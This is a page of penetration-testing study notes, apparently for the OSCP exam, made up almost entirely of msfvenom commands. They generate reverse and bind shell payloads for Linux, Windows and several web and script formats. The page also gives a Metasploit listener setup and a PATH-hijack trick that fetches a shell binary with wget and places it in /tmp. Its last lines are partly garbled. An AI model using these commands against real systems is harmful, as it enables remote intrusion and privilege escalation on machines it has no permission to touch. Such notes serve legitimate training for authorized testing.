O
O
OSCP Notes
Search
K
Comment on page

msfvenom

Show all payloads
msfvenom -l payloads
Show all payload formats
msfvenom -l formats
Generate a payload
msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> -o <output payload file name>
Common payloads
meterpreter
linux/x86/meterpreter/reverse_tcp
linux x86 reverse shell
linux/x64/meterpreter/reverse_tcp
linux x64 reverse shell
windows/meterpreter/reverse_tcp
windows x86 reverse shell
windows/x64/meterpreter/reverse_tcp
windows x64 reverse shell
Staged
linux/x86/shell/bind_tcp
linux x86 bind shell
linux/x86/shell/reverse_tcp
linux x86 reverse shell
windows/shell/bind_tcp
windows x86 bind shell
windows/shell/reverse_tcp
windows x86 reverse shell
Nonstaged
linux/x86/shell_bind_tcp
linux x86 bind shell
linux/x86/shell_reverse_tcp
linux x86 reverse shell
windows/shell_bind_tcp
windows x86 bind shell
windows/shell_reverse_tcp
windows x86 reverse shell

MSFVENOM PAYLOAD

Linux

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

Windows

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

PHP

msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

Python

msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl

Listener

Metasploit
use exploit/multi/handler
set PAYLOAD <PAYLOAD>
set LHOST <LHOST>
set LPORT <LPORT>
set ExitOnSession false
exploit -j -z
this creates a command for scp.
msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o scp
wget 192.168.1.23/scp -O /tmp/s** # transfer the exec binary over to Sufferance chmod 755 /tmp/scp
export PATH=/tmp:$PATH --> it sets the tmp as the path
/usr/local/bin/ # it'll now call our "special" scp binary in /tmp instead